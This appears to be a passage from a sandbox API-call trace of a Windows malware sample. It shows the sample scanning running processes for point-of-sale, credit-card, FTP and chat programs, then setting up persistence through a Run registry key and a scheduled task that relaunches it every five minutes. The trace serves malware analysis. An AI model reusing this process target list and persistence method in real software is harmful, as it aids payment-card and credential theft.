lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.327] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0072.327] CloseHandle (hObject=0x5a4) returned 1 [0072.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x5a4 [0072.327] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.329] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xdc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0072.329] CloseHandle (hObject=0x5a4) returned 1 [0072.330] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa1c) returned 0x5a4 [0072.330] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.332] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1320000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0072.332] CloseHandle (hObject=0x5a4) returned 1 [0072.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x5a4 [0072.332] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.334] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf20000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0072.335] CloseHandle (hObject=0x5a4) returned 1 [0072.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa3c) returned 0x5a4 [0072.335] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.337] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0072.337] CloseHandle (hObject=0x5a4) returned 1 [0072.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa4c) returned 0x5a4 [0072.338] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.339] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0072.340] CloseHandle (hObject=0x5a4) returned 1 [0072.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa5c) returned 0x5a4 [0072.340] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.342] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0072.343] CloseHandle (hObject=0x5a4) returned 1 [0072.343] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa6c) returned 0x5a4 [0072.343] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.345] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1250000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0072.345] CloseHandle (hObject=0x5a4) returned 1 [0072.345] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa7c) returned 0x5a4 [0072.345] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.347] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0072.348] CloseHandle (hObject=0x5a4) returned 1 [0072.348] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa8c) returned 0x5a4 [0072.348] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.350] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1090000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0072.350] CloseHandle (hObject=0x5a4) returned 1 [0072.350] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5a4 [0072.350] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.352] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1340000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0072.353] CloseHandle (hObject=0x5a4) returned 1 [0072.353] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaac) returned 0x5a4 [0072.353] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.355] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xdd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0072.355] CloseHandle (hObject=0x5a4) returned 1 [0072.355] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x5a4 [0072.356] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.357] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x350000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0072.358] CloseHandle (hObject=0x5a4) returned 1 [0072.358] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x5a4 [0072.358] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.360] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10d0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0072.361] CloseHandle (hObject=0x5a4) returned 1 [0072.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x5a4 [0072.361] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.362] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x150000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0072.363] CloseHandle (hObject=0x5a4) returned 1 [0072.363] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaec) returned 0x5a4 [0072.363] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.365] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb90000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0072.365] CloseHandle (hObject=0x5a4) returned 1 [0072.365] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xafc) returned 0x5a4 [0072.366] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.367] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0072.368] CloseHandle (hObject=0x5a4) returned 1 [0072.368] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb0c) returned 0x5a4 [0072.368] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.370] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0072.370] CloseHandle (hObject=0x5a4) returned 1 [0072.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb1c) returned 0x5a4 [0072.371] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.372] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8b0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0072.373] CloseHandle (hObject=0x5a4) returned 1 [0072.373] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb2c) returned 0x5a4 [0072.373] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.375] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1100000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0072.375] CloseHandle (hObject=0x5a4) returned 1 [0072.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb3c) returned 0x5a4 [0072.376] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.377] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xfc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0072.378] CloseHandle (hObject=0x5a4) returned 1 [0072.378] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb4c) returned 0x5a4 [0072.378] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.380] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1360000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0072.380] CloseHandle (hObject=0x5a4) returned 1 [0072.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb5c) returned 0x5a4 [0072.380] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.382] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1100000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0072.383] CloseHandle (hObject=0x5a4) returned 1 [0072.383] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb6c) returned 0x5a4 [0072.383] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.385] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1360000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ecuador.exe") returned 0xb [0072.385] CloseHandle (hObject=0x5a4) returned 1 [0072.385] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb7c) returned 0x5a4 [0072.385] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.387] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xdd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="string_encouraged_peers.exe") returned 0x1b [0072.387] CloseHandle (hObject=0x5a4) returned 1 [0072.387] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb8c) returned 0x5a4 [0072.387] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.389] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x180000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="statutestevens.exe") returned 0x12 [0072.389] CloseHandle (hObject=0x5a4) returned 1 [0072.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb9c) returned 0x5a4 [0072.389] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.391] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x240000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="baptist-lafayette.exe") returned 0x15 [0072.391] CloseHandle (hObject=0x5a4) returned 1 [0072.391] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbac) returned 0x5a4 [0072.391] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.393] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xce0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="summaries.exe") returned 0xd [0072.393] CloseHandle (hObject=0x5a4) returned 1 [0072.393] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x0 [0072.393] CloseHandle (hObject=0x0) returned 0 [0072.393] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x0 [0072.393] CloseHandle (hObject=0x0) returned 0 [0072.393] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x5a4 [0072.394] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.395] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 0x40 [0072.395] CloseHandle (hObject=0x5a4) returned 1 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x6a9fd0 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x317a4f8 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x317a760 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x317a9c8 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x317ac30 [0072.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3186878 [0072.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3186ae0 [0072.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3186d48 [0072.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3186fb0 [0072.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3187218 [0072.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3187480 [0072.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df70 | out: phkResult=0x18df70*=0x5a4) returned 0x0 [0072.416] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18df6c, lpData=0x18c698, lpcbData=0x18df50*=0x400 | out: lpType=0x18df6c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart", lpcbData=0x18df50*=0x140) returned 0x0 [0072.416] RegCloseKey (hKey=0x5a4) returned 0x0 [0072.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x140) returned 0x6ce048 [0072.416] lstrlenA (lpString="\" --AutoStart") returned 13 [0072.416] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x3150248 [0072.416] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ce048 | out: hHeap=0x680000) returned 1 [0072.417] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 1 [0072.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x31521c8 [0072.417] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0072.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x3150248 [0072.417] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x31467a0 [0072.417] CoInitialize (pvReserved=0x0) returned 0x0 [0072.428] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0072.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x130) returned 0x3149ab8 [0072.429] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18df5c | out: ppv=0x18df5c*=0x28208b8) returned 0x0 [0072.438] TaskScheduler:ITaskService:Connect (This=0x28208b8, serverName=0x18d9e8*(varType=0x0, wReserved1=0x315, wReserved2=0x240, wReserved3=0x315, varVal1=0x97, varVal2=0x130), user=0x18d9f8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x138), domain=0x18da08*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), password=0x18da18*(varType=0x0, wReserved1=0x318, wReserved2=0xdf04, wReserved3=0x18, varVal1=0x420cab, varVal2=0x680000)) returned 0x0 [0072.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179020 [0072.441] TaskScheduler:ITaskService:GetFolder (in: This=0x28208b8, Path="\\", ppFolder=0x18df64 | out: ppFolder=0x18df64*=0x2820920) returned 0x0 [0072.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179020 | out: hHeap=0x680000) returned 1 [0072.442] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179020 [0072.442] ITaskFolder:DeleteTask (This=0x2820920, Name="Time Trigger Task", flags=0) returned 0x0 [0072.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179020 | out: hHeap=0x680000) returned 1 [0072.526] TaskScheduler:ITaskService:NewTask (in: This=0x28208b8, flags=0x0, ppDefinition=0x18df68 | out: ppDefinition=0x18df68*=0x2820950) returned 0x0 [0072.527] TaskScheduler:IUnknown:Release (This=0x28208b8) returned 0x1 [0072.527] ITaskDefinition:get_RegistrationInfo (in: This=0x2820950, ppRegistrationInfo=0x18df3c | out: ppRegistrationInfo=0x18df3c*=0x2820a10) returned 0x0 [0072.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.527] IRegistrationInfo:put_Author (This=0x2820a10, Author="Author Name") returned 0x0 [0072.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.527] IUnknown:Release (This=0x2820a10) returned 0x1 [0072.527] ITaskDefinition:get_Principal (in: This=0x2820950, ppPrincipal=0x18df44 | out: ppPrincipal=0x18df44*=0x2820ba0) returned 0x0 [0072.528] IPrincipal:put_LogonType (This=0x2820ba0, LogonType=3) returned 0x0 [0072.528] IUnknown:Release (This=0x2820ba0) returned 0x1 [0072.528] ITaskDefinition:get_Settings (in: This=0x2820950, ppSettings=0x18df4c | out: ppSettings=0x18df4c*=0x2820ac0) returned 0x0 [0072.528] ITaskSettings:put_StartWhenAvailable (This=0x2820ac0, StartWhenAvailable=1) returned 0x0 [0072.528] IUnknown:Release (This=0x2820ac0) returned 0x1 [0072.528] ITaskSettings:get_IdleSettings (in: This=0x2820ac0, ppIdleSettings=0x18df30 | out: ppIdleSettings=0x18df30*=0x2820b30) returned 0x0 [0072.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.529] IIdleSettings:put_WaitTimeout (This=0x2820b30, WaitTimeout="PT5M") returned 0x0 [0072.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.529] IUnknown:Release (This=0x2820b30) returned 0x1 [0072.529] ITaskDefinition:get_Triggers (in: This=0x2820950, ppTriggers=0x18df2c | out: ppTriggers=0x18df2c*=0x2820a80) returned 0x0 [0072.529] ITriggerCollection:Create (in: This=0x2820a80, Type=1, ppTrigger=0x18df38 | out: ppTrigger=0x18df38*=0x2820c00) returned 0x0 [0072.529] IUnknown:Release (This=0x2820a80) returned 0x1 [0072.529] IUnknown:QueryInterface (in: This=0x2820c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18df54 | out: ppvObject=0x18df54*=0x2820c00) returned 0x0 [0072.529] IUnknown:Release (This=0x2820c00) returned 0x2 [0072.530] ITrigger:get_Repetition (in: This=0x2820c00, ppRepeat=0x18df40 | out: ppRepeat=0x18df40*=0x2820c50) returned 0x0 [0072.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.530] IRepetitionPattern:put_Interval (This=0x2820c50, Interval="PT5M") returned 0x0 [0072.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.530] IRepetitionPattern:put_Duration (This=0x2820c50, Duration="") returned 0x0 [0072.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.530] ITrigger:put_Repetition (This=0x2820c00, Repetition=0x2820c50) returned 0x0 [0072.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.531] ITrigger:put_Id (This=0x2820c00, Id="Trigger1") returned 0x0 [0072.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.531] ITrigger:put_EndBoundary (This=0x2820c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0072.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18da14 | out: lpSystemTimeAsFileTime=0x18da14*(dwLowDateTime=0x9b712ac0, dwHighDateTime=0x1d5d6b4)) [0072.540] GetLastError () returned 0x0 [0072.540] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0072.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d97c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d97c) returned 26 [0072.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d97c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d97c) returned 26 [0072.542] GetLastError () returned 0x0 [0072.542] ITrigger:put_StartBoundary (This=0x2820c00, StartBoundary="2020-01-30T02:00:26") returned 0x0 [0072.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189700 | out: hHeap=0x680000) returned 1 [0072.542] IUnknown:Release (This=0x2820c00) returned 0x1 [0072.542] ITaskDefinition:get_Actions (in: This=0x2820950, ppActions=0x18df48 | out: ppActions=0x18df48*=0x28209c8) returned 0x0 [0072.542] IActionCollection:Create (in: This=0x28209c8, Type=0, ppAction=0x18df34 | out: ppAction=0x18df34*=0x2820c98) returned 0x0 [0072.542] IUnknown:Release (This=0x28209c8) returned 0x1 [0072.542] IUnknown:QueryInterface (in: This=0x2820c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18df50 | out: ppvObject=0x18df50*=0x2820c98) returned 0x0 [0072.542] IUnknown:Release (This=0x2820c98) returned 0x2 [0072.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.543] IExecAction:put_Path (This=0x2820c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 0x0 [0072.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.543] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.543] IExecAction:put_Arguments (This=0x2820c98, Arguments="--Task") returned 0x0 [0072.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.543] IUnknown:Release (This=0x2820c98) returned 0x1 [0072.543] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x3179050 [0072.543] ITaskFolder:RegisterTaskDefinition (in: This=0x2820920, Path="Time Trigger Task", pDefinition=0x2820950, flags=6, UserId=0x18d9f0*(varType=0x0, wReserved1=0x318, wReserved2=0xdf04, wReserved3=0x18, varVal1=0x420cab, varVal2=0x680000), password=0x18da00*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), LogonType=3, sddl=0x18da14*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x138), ppTask=0x18df1c | out: ppTask=0x18df1c*=0x2820d18) returned 0x0 [0072.624] HeapFree (in: hHeap=0x680000, 